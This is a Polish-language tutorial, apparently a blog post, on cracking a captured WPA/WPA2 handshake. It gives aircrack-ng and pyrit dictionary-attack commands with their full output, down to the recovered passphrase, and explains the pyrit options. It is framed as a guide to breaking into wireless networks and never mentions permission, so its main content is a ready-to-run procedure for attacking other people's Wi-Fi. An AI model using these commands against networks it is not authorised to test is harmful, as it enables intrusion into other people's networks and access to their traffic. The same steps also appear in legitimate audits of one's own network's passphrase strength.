[WiFi] – Ataki na handshake WPA

Ten tutorial jest kontynuacją artykułu dotyczącego przechwytywania pakietów z handshake pokazujący jak łatwo odzyskać hasło lub włamać się do sieci bezprzewodowej chronionej przez WPA/WPA2.

No dobra, pokażę Ci jak łamać szyfr z handshake. Tak wygląda okno programu airodump-ng gdy handshake został złapany, ale to już wiesz:

[ CH  1 ][ Elapsed: 12 s ][ 2011-01-12 17:24 ][ WPA handshake: 00:04:ED:A3:80:11]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
 
00:04:ED:A3:80:11 -53 40 130 27 9 1 54 WPA2 CCMP PSK NASA
 
BSSID STATION PWR Rate Lost Packets Probes
 
00:04:ED:A3:80:11 48:5D:60:34:A8:59 0 0 -54 0 25 NASA
00:04:ED:A3:80:11 00:4F:78:00:A2:A5 -40 24 - 1 28 25

Skoro już go masz to należy go teraz zepsuć!

Potrzebujemy do tego aircrack-ng żeby zepsuć, psujemy takim to poleceniem:

aircrack-ng -w slownik.txt -b 00:04:ED:A3:80:11 NASA.cap
[00:05:48] 664220 keys tested (2100.59 k/s)
Current passphrase: imakinlazczsupzoR
 
Master Key : D9 06 78 99 66 B2 50 65 48 E1 99 7B 87 19 5F 7F
45 F8 F9 48 28 A2 7C EF A7 90 E5 5C 80 BC FC 9A
 
Transient Key : 1B 05 70 73 25 45 7C DB 1E 95 73 37 0C F7 F2 24
26 56 DD 2C 8B 09 0F 58 57 5F D8 4A EA D3 94 83
BC 48 F8 1E 84 4A 92 46 19 C3 48 BC 7B 21 6D 16
C3 19 AD 27 14 D0 76 33 44 32 65 FE 1F 8D 97 6C
 
EAPOL HMAC : 05 46 D3 00 99 FC A8 82 F8 CF C1 2B EC 87 F4 5F

W poleceniu użyto opcji ataku słownikowego, ponieważ mam bardzo duży słownik to często go używam

Aircrack-ng 1.0
[00:11:45] 8914110 keys tested (2041.75 k/s)
 
KEY FOUND! [ haxored1 ]
 
Master Key : C6 AC CD E4 AF 58 CA 8A 51 8E C4 BC A1 50 F9 DE
72 55 48 F6 E1 6F 26 23 2C 7F AA E6 8A 7F 98 6C
 
Transient Key : 86 CA 39 4F C6 9A C2 CD 2D 06 0F E9 83 E6 DE FC
3F 24 70 D0 0C F6 B8 44 FB FE D5 5A 03 CF D3 94
06 90 AC C7 7F 41 EF DE DA 8D 72 89 B2 82 A3 4C
F1 69 2F E3 59 B9 73 1E A1 AF 67 57 DA 16 8A 11
 
EAPOL HMAC : 83 55 E7 96 C4 C4 96 C2 32 AF 5D 9B 40 81 AC F5

Zróbmy to szybciej!

W jednym z moich poprzednich tutoriali pokazywałem jak zainstalować pyrit wraz z cpyrit dla kart ATI z OCL.

Użyjemy teraz projektu z Summer Google Code do ataku na handshake. Narzędzie pyrit do tego ataku użyje mocy obliczeniowej CPU+GPU (u mnie jest to i7 740QM + ATI HD5730)

Proszę pamiętać, że pyrit to narzędzie do doświadczeń crackingu (słowa developera narzędzia).

Sprawdzamy czy w przechwyconych przez nas pakietach pyrit wykrywa dane handshake.

$ pyrit -r NASA-01.cap analyze
Pyrit 0.4.0-dev (svn r288) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'NASA-01.cap' (1/1)...
Parsed 7 packets (7 802.11-packets), got 1 AP(s)
 
#1: AccessPoint 00:04:ed:a3:80:11 ('NASA'):
#1: Station 00:1f:e1:02:dc:9e
#2: Station 00:4f:78:00:a2:a5, 1 handshake(s):
#1: HMAC_SHA1_AES, good, spread 1
#3: Station 48:5d:60:34:a8:59

No skoro wykrywa to dowiedzmy się jakie jest hasło:

$ pyrit -r NASA-01.cap -i slownik.txt -b 00:04:ED:A3:80:11 attack_passthrough
Pyrit 0.4.0-dev (svn r288) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'NASA-01.cap' (1/1)...
Parsed 7 packets (7 802.11-packets), got 1 AP(s)
 
Tried 120006 PMKs so far; 12304 PMKs per second.
 
The password is 'haxored1'.
pyrit -r NASA-01.cap -i slownik.txt -b 00:04:ED:A3:80:11 attack_passthrough
  • -r plik cap.
  •  -i podajemy ścieżkę do słownika, który chcesz przeszukać za hasłem
  • -b <tutaj_bssid>
  • na końcu polecenia podaje się jaki ma być atak, dictionary-attack opisany jest jako attack_passthrough

 

Komentarz od-autorski:
Nie, nie warto używać tęczowych tablic do ataków na WPA/WPA2, stracisz miesiące (lata?) na tworzenie takich tablic, hasło w tym czasie może zostać zmienione, wtedy ponownie będzie trzeba uzyskać handshake. W tym wypadku słowniki są najlepszym rozwiązaniem.

[Total: 0    Average: 0/5]